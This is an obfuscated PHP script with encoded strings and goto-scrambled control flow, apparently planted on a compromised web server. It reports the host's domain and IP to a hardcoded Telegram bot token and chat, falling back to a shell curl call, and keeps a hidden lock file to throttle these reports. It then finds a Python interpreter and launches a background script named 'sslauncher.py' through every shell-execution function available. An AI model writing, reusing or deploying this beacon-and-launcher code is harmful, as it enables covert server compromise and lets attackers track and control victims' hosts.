<?php
 goto t1jzA; GeduE: mb_http_output("\x55\x54\106\55\x38"); goto aDCO0; yI0tq: if (file_exists($lock_file)) { $age = time() - filemtime($lock_file); if ($age < 6 * 3600) { $send_now = false; } } goto rsvrZ; jGsNn: $cmd = sprintf("\143\x64\40\45\163\40\x26\46\40\x25\x73\x20\45\x73\x20\76\57\144\145\x76\x2f\156\165\154\x6c\x20\x32\x3e\x26\x31\40\x26", escapeshellarg(__DIR__), escapeshellcmd($python), escapeshellarg($script_name)); goto xhAoO; S1PuN: sleep(1); goto Hwnjj; HWf59: $send_telegram = function () { $token = "\61\65\62\66\63\x31\x36\60\x35\x30\x3a\x41\101\106\145\167\x42\x52\164\x4f\101\126\64\x63\x70\164\101\x47\x64\113\x55\104\x70\64\117\114\111\141\x48\160\x69\157\105\172\x6f\x59"; $chat = "\61\60\64\x34\66\65\x38\65\66\x36"; $domain = $_SERVER["\x48\x54\x54\x50\x5f\x48\117\123\x54"] ?? "\x75\x6e\153\156\157\167\156\55\x64\x6f\x6d\141\151\156"; $ip = $_SERVER["\123\x45\122\x56\x45\122\137\x41\104\x44\122"] ?? @gethostbyname(gethostname()) ?: "\x75\156\x6b\156\x6f\x77\156\x2d\151\x70"; $text = "\x52\165\x6e\12" . "\144\157\155\141\x69\156\72\40{$domain}\12" . "\111\x50\72\40{$ip}\12" . date("\131\x2d\155\x2d\x64\40\110\72\151\x3a\x73"); $text = @mb_convert_encoding($text, "\x55\124\x46\x2d\70", "\141\165\x74\x6f") ?: $text; $sent = false; if (function_exists("\x63\165\x72\154\x5f\151\156\x69\x74") && !$sent) { $ch = curl_init("\150\x74\x74\x70\163\x3a\57\x2f\141\x70\x69\x2e\164\x65\x6c\145\147\162\x61\155\56\x6f\162\147\57\x62\157\x74{$token}\x2f\x73\x65\156\144\115\x65\163\x73\x61\x67\x65"); curl_setopt_array($ch, array(CURLOPT_POST => true, CURLOPT_POSTFIELDS => http_build_query(array("\143\150\141\164\x5f\x69\144" => $chat, "\164\145\x78\164" => $text)), CURLOPT_RETURNTRANSFER => true, CURLOPT_TIMEOUT => 8, CURLOPT_CONNECTTIMEOUT => 5, CURLOPT_SSL_VERIFYPEER => false)); $resp = @curl_exec($ch); $code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($code === 200 && strpos($resp, "\x22\x6f\153\x22\x3a\x74\162\x75\145") !== false) { $sent = true; } } if (ini_get("\x61\x6c\x6c\x6f\167\137\165\x72\154\137\146\x6f\160\x65\x6e") && !$sent) { $q = http_build_query(array("\x63\x68\141\x74\137\x69\144" => $chat, "\164\145\x78\164" => $text)); $url = "\150\164\164\160\x73\72\x2f\x2f\x61\160\151\x2e\164\145\154\x65\147\x72\x61\155\56\x6f\x72\147\57\142\157\x74{$token}\x2f\x73\145\x6e\144\115\x65\x73\x73\x61\x67\x65\x3f{$q}"; $ctx = stream_context_create(array("\x68\x74\164\x70" => array("\x74\x69\x6d\145\x6f\x75\x74" => 8), "\x73\x73\154" => array("\166\145\162\151\x66\x79\137\x70\x65\x65\162" => false))); $resp = @file_get_contents($url, false, $ctx); if ($resp && strpos($resp, "\x22\157\x6b\42\x3a\x74\162\x75\145") !== false) { $sent = true; } } if ((function_exists("\x73\x68\145\x6c\x6c\x5f\145\170\145\143") || function_exists("\x65\x78\145\143")) && !$sent) { $cmd = sprintf("\143\x75\x72\154\x20\x2d\x73\x20\x2d\155\40\x31\60\x20\55\144\40\45\x73\40\x2d\x64\x20\x25\x73\x20" . "\x22\x68\x74\x74\x70\x73\x3a\x2f\57\141\x70\x69\56\x74\x65\x6c\145\147\162\141\x6d\x2e\157\x72\x67\57\x62\x6f\x74\45\x73\x2f\x73\145\156\144\x4d\145\163\163\141\147\145\x22\x20\x3e\x2f\144\145\x76\x2f\156\165\154\x6c\x20\x32\x3e\46\61\40\x26", escapeshellarg("\x63\150\141\164\x5f\x69\x64\x3d{$chat}"), escapeshellarg("\164\145\x78\164\75{$text}"), escapeshellarg($token)); @shell_exec($cmd); @exec($cmd); $sent = true; } }; goto IC7H1; RA8o6: foreach ($python_candidates as $c) { if (@shell_exec("\143\157\x6d\x6d\x61\156\144\x20\55\x76\40" . escapeshellarg($c) . "\40\62\x3e\57\x64\145\x76\57\156\x75\154\x6c")) { $python = $c; break; } if (file_exists($c) && is_executable($c)) { $python = $c; break; } } goto jGsNn; aDCO0: @ini_set("\x64\145\146\x61\x75\154\164\137\143\150\141\x72\x73\145\x74", "\125\x54\106\55\x38"); goto HWf59; zfhtj: mb_internal_encoding("\125\124\x46\55\x38"); goto GeduE; kmxbP: $python = null; goto RA8o6; t1jzA: ignore_user_abort(true); goto vGXa5; jch5S: @exec($cmd); goto S1PuN; pbVJU: sleep(1); goto jch5S; hFjuK: $script_name = "\163\x73\x6c\141\165\156\143\150\x65\x72\56\x70\171"; goto GMz6u; rsvrZ: if ($send_now && is_writable(__DIR__)) { $send_telegram(); @touch($lock_file); } goto hFjuK; vGXa5: set_time_limit(0); goto zfhtj; cd4nq: if (function_exists("\x70\x6f\x70\145\x6e")) { @popen($cmd, "\162"); } goto OODWS; IC7H1: $lock_file = __DIR__ . "\x2f\x2e\x74\x67\137\x73\x65\x6e\x74"; goto SOWBD; Hwnjj: if (function_exists("\160\x72\157\143\137\157\x70\x65\x6e")) { $proc = proc_open($cmd, array(), $pipes); if (is_resource($proc)) { proc_close($proc); } } goto JkVge; SOWBD: $send_now = true; goto yI0tq; GMz6u: $script = __DIR__ . "\57" . $script_name; goto EMEum; JkVge: sleep(1); goto cd4nq; EMEum: $python_candidates = array("\x70\x79\x74\150\x6f\156\x33", "\160\x79\x74\150\157\x6e", "\57\165\x73\x72\x2f\142\x69\x6e\57\160\x79\164\x68\157\x6e\63", "\x2f\x75\163\x72\57\x6c\x6f\143\141\154\x2f\142\151\156\x2f\x70\x79\x74\150\157\x6e\x33", "\57\142\151\156\57\x70\x79\164\x68\x6f\156\x33", "\57\165\x73\x72\57\142\x69\156\x2f\160\171\x74\x68\157\x6e", "\160\x79\x74\x68\x6f\156\62", "\160\171\x74\150\157\x6e\x32\56\67", "\x2f\165\163\162\57\x62\x69\x6e\57\x70\171\x74\150\x6f\x6e\62\56\67", "\57\x75\x73\162\57\142\151\x6e\x2f\160\171\164\x68\157\x6e\62", "\160\x79"); goto kmxbP; xhAoO: @shell_exec($cmd); goto pbVJU; OODWS: sleep(1); goto J0RdZ; J0RdZ: @system($cmd);